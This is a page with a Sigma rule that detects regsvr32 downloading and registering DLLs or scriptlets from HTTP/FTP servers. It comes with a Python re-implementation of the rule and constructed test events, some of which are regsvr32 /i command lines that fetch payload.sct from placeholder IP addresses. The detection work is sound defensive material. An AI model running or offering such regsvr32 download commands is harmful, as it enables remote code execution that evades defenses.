Potentially Suspicious Regsvr32 HTTP/FTP Pattern

Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.

Sigma rule

```yaml
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
    - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
      type: obsoletes
status: test
description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
    - https://twitter.com/tccontre18/status/1480950986650832903
    - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2023/05/24
modified: 2023/05/26
tags:
    - attack.defense_evasion
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\regsvr32.exe'
        - OriginalFileName: 'REGSVR32.EXE'
    selection_flag:
        CommandLine|contains:
            - ' /i'
            - ' -i'
    selection_protocol:
        CommandLine|contains:
            - 'ftp'
            - 'http'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
```
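To see what the three selections actually catch, the following added example re-implements the rule's logic in Python and runs it over a handful of constructed process_creation events. It is not part of the Sigma project or this rule; the events, paths and IP addresses are invented for illustration. Sigma string matching (`contains`, `endswith`, plain equality) is case-insensitive by default, which the helpers mirror by lower-casing both sides.

```python
"""Re-implementation of the rule's detection block for illustration.

Added example, not Sigma project code. SAMPLE_EVENTS below are constructed,
not real telemetry.
"""

# selection_flag: CommandLine|contains (note the leading space in the rule)
RULE_FLAGS = (" /i", " -i")
# selection_protocol: CommandLine|contains
RULE_PROTOCOLS = ("ftp", "http")


def sel_img(event):
    """Image|endswith '\\regsvr32.exe' OR OriginalFileName == 'REGSVR32.EXE'.

    The OriginalFileName branch is what catches a renamed copy of the binary.
    """
    image = event.get("Image", "").lower()
    orig = event.get("OriginalFileName", "").lower()
    return image.endswith("\\regsvr32.exe") or orig == "regsvr32.exe"


def sel_flag(event):
    """Any of ' /i' or ' -i' appears anywhere in the command line."""
    cmd = event.get("CommandLine", "").lower()
    return any(flag in cmd for flag in RULE_FLAGS)


def sel_protocol(event):
    """Any of 'ftp' or 'http' appears anywhere in the command line."""
    cmd = event.get("CommandLine", "").lower()
    return any(proto in cmd for proto in RULE_PROTOCOLS)


def matches(event):
    """condition: all of selection_*"""
    return sel_img(event) and sel_flag(event) and sel_protocol(event)


# Constructed sample events (hypothetical, for demonstration only).
SAMPLE_EVENTS = [
    # 0: classic scrobj.dll scriptlet fetch over HTTP -> should match
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll"},
    # 1: renamed binary, FTP source -> caught via OriginalFileName
    {"Image": r"C:\Windows\Temp\svc.exe",
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": "svc.exe -i:ftp://203.0.113.5/a.sct scrobj.dll"},
    # 2: benign silent registration of a local DLL, no /i -> no match
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\httpclient.dll"'},
    # 3: /i used with a local path, no ftp/http anywhere -> no match
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"regsvr32.exe /i C:\Temp\comp.dll"},
    # 4: /i plus a local DLL whose NAME contains 'http' -> matches (false positive)
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r'regsvr32.exe /i "C:\Program Files\Vendor\httpclient.dll"'},
    # 5: different image with both substrings present -> no match
    {"Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c curl http://192.0.2.10/ /i"},
]


def run_rule(events=SAMPLE_EVENTS):
    """Return the indices of events the rule would alert on."""
    return [i for i, ev in enumerate(events) if matches(ev)]


if __name__ == "__main__":
    for idx in run_rule():
        print(f"alert: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Event 4 is worth noting when tuning: because `selection_protocol` only checks for the substrings `ftp` and `http` rather than a `://` scheme, a local DLL path that happens to contain `http` together with an `/i` switch will trigger the rule. That is a reasonable trade for a medium-severity hunting rule, but an environment with such products should expect to add a filter for them.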
